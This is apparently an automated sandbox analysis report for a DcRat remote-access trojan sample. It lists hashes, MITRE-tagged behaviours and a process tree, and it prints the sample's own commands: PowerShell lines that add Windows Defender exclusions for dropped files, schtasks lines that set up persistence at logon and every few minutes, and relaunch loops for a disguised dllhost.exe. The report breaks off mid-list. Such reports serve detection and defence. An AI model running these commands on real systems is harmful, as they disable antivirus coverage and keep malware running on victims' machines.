dcrat | cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5

Analysis

max time kernel
150s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2024, 01:12 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5.exe
Size

1.3MB
MD5

fd4723d4daed5b787199a3d5e21040b5
SHA1

533cff7711b4d262509260280227fcb0d0433b67
SHA256

cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5
SHA512

821cc704eaacd6cdf1891a382629ada668952d151bdd30acc8e657bcf50d6cdd1c2f9e584cbf99a40e53af726600ac7ab413ed4f3c42a90cf805b089dd043cf9
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	964	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1964	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2148	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1872	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3616	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	532	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3984	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4604	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1052	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5000	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1304	4448	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4320	4448	schtasks.exe	86

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x000a000000023b4e-10.dat	dcrat
behavioral2/memory/4856-13-0x0000000000100000-0x0000000000210000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2740	powershell.exe
5024	powershell.exe
1812	powershell.exe
1840	powershell.exe
4784	powershell.exe

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	JaffaCakes118_cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	dllhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe

Executes dropped EXE 16 IoCs

pid	Process
4856	DllCommonsvc.exe
1520	dllhost.exe
2232	dllhost.exe
3304	dllhost.exe
3272	dllhost.exe
4276	dllhost.exe
1336	dllhost.exe
4200	dllhost.exe
4320	dllhost.exe
3436	dllhost.exe
2988	dllhost.exe
1484	dllhost.exe
4456	dllhost.exe
3528	dllhost.exe
4560	dllhost.exe
4520	dllhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
46	raw.githubusercontent.com
55	raw.githubusercontent.com
15	raw.githubusercontent.com
45	raw.githubusercontent.com
47	raw.githubusercontent.com
54	raw.githubusercontent.com
57	raw.githubusercontent.com
58	raw.githubusercontent.com
59	raw.githubusercontent.com
16	raw.githubusercontent.com
24	raw.githubusercontent.com
39	raw.githubusercontent.com
40	raw.githubusercontent.com
41	raw.githubusercontent.com
56	raw.githubusercontent.com

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Offline Web Pages\dllhost.exe	DllCommonsvc.exe
File created	C:\Windows\Offline Web Pages\5940a34987c991	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	JaffaCakes118_cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	dllhost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
964	schtasks.exe
5000	schtasks.exe
4320	schtasks.exe
532	schtasks.exe
3984	schtasks.exe
4604	schtasks.exe
1052	schtasks.exe
1964	schtasks.exe
2148	schtasks.exe
1872	schtasks.exe
3616	schtasks.exe
1304	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4856	DllCommonsvc.exe
4856	DllCommonsvc.exe
4856	DllCommonsvc.exe
4856	DllCommonsvc.exe
4856	DllCommonsvc.exe
4784	powershell.exe
1840	powershell.exe
1812	powershell.exe
2740	powershell.exe
5024	powershell.exe
2740	powershell.exe
4784	powershell.exe
1520	dllhost.exe
1812	powershell.exe
1840	powershell.exe
5024	powershell.exe
2232	dllhost.exe
3304	dllhost.exe
3272	dllhost.exe
4276	dllhost.exe
1336	dllhost.exe
4200	dllhost.exe
4320	dllhost.exe
3436	dllhost.exe
2988	dllhost.exe
1484	dllhost.exe
4456	dllhost.exe
3528	dllhost.exe
4560	dllhost.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	4856	DllCommonsvc.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	1520	dllhost.exe
Token: SeDebugPrivilege	2232	dllhost.exe
Token: SeDebugPrivilege	3304	dllhost.exe
Token: SeDebugPrivilege	3272	dllhost.exe
Token: SeDebugPrivilege	4276	dllhost.exe
Token: SeDebugPrivilege	1336	dllhost.exe
Token: SeDebugPrivilege	4200	dllhost.exe
Token: SeDebugPrivilege	4320	dllhost.exe
Token: SeDebugPrivilege	3436	dllhost.exe
Token: SeDebugPrivilege	2988	dllhost.exe
Token: SeDebugPrivilege	1484	dllhost.exe
Token: SeDebugPrivilege	4456	dllhost.exe
Token: SeDebugPrivilege	3528	dllhost.exe
Token: SeDebugPrivilege	4560	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3212 wrote to memory of 4408	3212	JaffaCakes118_cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5.exe	82
PID 3212 wrote to memory of 4408	3212	JaffaCakes118_cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5.exe	82
PID 3212 wrote to memory of 4408	3212	JaffaCakes118_cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5.exe	82
PID 4408 wrote to memory of 2080	4408	WScript.exe	83
PID 4408 wrote to memory of 2080	4408	WScript.exe	83
PID 4408 wrote to memory of 2080	4408	WScript.exe	83
PID 2080 wrote to memory of 4856	2080	cmd.exe	85
PID 2080 wrote to memory of 4856	2080	cmd.exe	85
PID 4856 wrote to memory of 2740	4856	DllCommonsvc.exe	99
PID 4856 wrote to memory of 2740	4856	DllCommonsvc.exe	99
PID 4856 wrote to memory of 5024	4856	DllCommonsvc.exe	100
PID 4856 wrote to memory of 5024	4856	DllCommonsvc.exe	100
PID 4856 wrote to memory of 1812	4856	DllCommonsvc.exe	101
PID 4856 wrote to memory of 1812	4856	DllCommonsvc.exe	101
PID 4856 wrote to memory of 1840	4856	DllCommonsvc.exe	102
PID 4856 wrote to memory of 1840	4856	DllCommonsvc.exe	102
PID 4856 wrote to memory of 4784	4856	DllCommonsvc.exe	103
PID 4856 wrote to memory of 4784	4856	DllCommonsvc.exe	103
PID 4856 wrote to memory of 1520	4856	DllCommonsvc.exe	108
PID 4856 wrote to memory of 1520	4856	DllCommonsvc.exe	108
PID 1520 wrote to memory of 3892	1520	dllhost.exe	110
PID 1520 wrote to memory of 3892	1520	dllhost.exe	110
PID 3892 wrote to memory of 912	3892	cmd.exe	112
PID 3892 wrote to memory of 912	3892	cmd.exe	112
PID 3892 wrote to memory of 2232	3892	cmd.exe	116
PID 3892 wrote to memory of 2232	3892	cmd.exe	116
PID 2232 wrote to memory of 4816	2232	dllhost.exe	120
PID 2232 wrote to memory of 4816	2232	dllhost.exe	120
PID 4816 wrote to memory of 440	4816	cmd.exe	122
PID 4816 wrote to memory of 440	4816	cmd.exe	122
PID 4816 wrote to memory of 3304	4816	cmd.exe	123
PID 4816 wrote to memory of 3304	4816	cmd.exe	123
PID 3304 wrote to memory of 3056	3304	dllhost.exe	126
PID 3304 wrote to memory of 3056	3304	dllhost.exe	126
PID 3056 wrote to memory of 4040	3056	cmd.exe	128
PID 3056 wrote to memory of 4040	3056	cmd.exe	128
PID 3056 wrote to memory of 3272	3056	cmd.exe	129
PID 3056 wrote to memory of 3272	3056	cmd.exe	129
PID 3272 wrote to memory of 3096	3272	dllhost.exe	130
PID 3272 wrote to memory of 3096	3272	dllhost.exe	130
PID 3096 wrote to memory of 3260	3096	cmd.exe	132
PID 3096 wrote to memory of 3260	3096	cmd.exe	132
PID 3096 wrote to memory of 4276	3096	cmd.exe	133
PID 3096 wrote to memory of 4276	3096	cmd.exe	133
PID 4276 wrote to memory of 1812	4276	dllhost.exe	134
PID 4276 wrote to memory of 1812	4276	dllhost.exe	134
PID 1812 wrote to memory of 1452	1812	cmd.exe	136
PID 1812 wrote to memory of 1452	1812	cmd.exe	136
PID 1812 wrote to memory of 1336	1812	cmd.exe	137
PID 1812 wrote to memory of 1336	1812	cmd.exe	137
PID 1336 wrote to memory of 2212	1336	dllhost.exe	138
PID 1336 wrote to memory of 2212	1336	dllhost.exe	138
PID 2212 wrote to memory of 4528	2212	cmd.exe	140
PID 2212 wrote to memory of 4528	2212	cmd.exe	140
PID 2212 wrote to memory of 4200	2212	cmd.exe	141
PID 2212 wrote to memory of 4200	2212	cmd.exe	141
PID 4200 wrote to memory of 4904	4200	dllhost.exe	142
PID 4200 wrote to memory of 4904	4200	dllhost.exe	142
PID 4904 wrote to memory of 4328	4904	cmd.exe	144
PID 4904 wrote to memory of 4328	4904	cmd.exe	144
PID 4904 wrote to memory of 4320	4904	cmd.exe	145
PID 4904 wrote to memory of 4320	4904	cmd.exe	145
PID 4320 wrote to memory of 3540	4320	dllhost.exe	146
PID 4320 wrote to memory of 3540	4320	dllhost.exe	146

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_cfb5caa044fc0f2dfffa6ef4f0788c2afefb3831796611f26be6a230e7a6f9c5.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3212
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2080
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4856
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\taskhostw.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5024
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Contacts\TextInputHost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1812
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1840
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\dwm.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4784
    - - C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1520
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uSow6ZWML2.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3892
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:912
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2232
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yQDva2PSBr.bat"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4816
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:440
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3304
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\BHs9KC1JDp.bat"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:3056
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        11⤵
        
        PID:4040
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3272
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ctDgUbHuaY.bat"
        12⤵
        Suspicious use of WriteProcessMemory
        
        PID:3096
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        13⤵
        
        PID:3260
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4276
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TA6UjH3MJQ.bat"
        14⤵
        Suspicious use of WriteProcessMemory
        
        PID:1812
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        15⤵
        
        PID:1452
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1336
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8UyA8TRco5.bat"
        16⤵
        Suspicious use of WriteProcessMemory
        
        PID:2212
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        17⤵
        
        PID:4528
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4200
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6Po3x2tXZG.bat"
        18⤵
        Suspicious use of WriteProcessMemory
        
        PID:4904
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        19⤵
        
        PID:4328
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4320
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ljgkLFIn4v.bat"
        20⤵
        
        PID:3540
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        21⤵
        
        PID:4816
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3436
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xZLz5Ote6t.bat"
        22⤵
        
        PID:2200
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        23⤵
        
        PID:3788
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2988
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SzaURWjxsM.bat"
        24⤵
        
        PID:1264
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        25⤵
        
        PID:1796
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        25⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6Po3x2tXZG.bat"
        26⤵
        
        PID:2956
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        27⤵
        
        PID:4276
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        27⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4456
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wOqzmeZFfo.bat"
        28⤵
        
        PID:4580
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        29⤵
        
        PID:4696
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        29⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3528
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rfuxuqwfwI.bat"
        30⤵
        
        PID:672
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        31⤵
        
        PID:4892
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        31⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4560
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wUBsuxMZs4.bat"
        32⤵
        
        PID:3700
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        33⤵
        
        PID:244
        
        C:\Windows\Offline Web Pages\dllhost.exe
        
        "C:\Windows\Offline Web Pages\dllhost.exe"
        33⤵
        Executes dropped EXE
        
        PID:4520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Default User\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Contacts\TextInputHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Admin\Contacts\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\Contacts\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:532

C:\Windows\system32\schtasks.exe
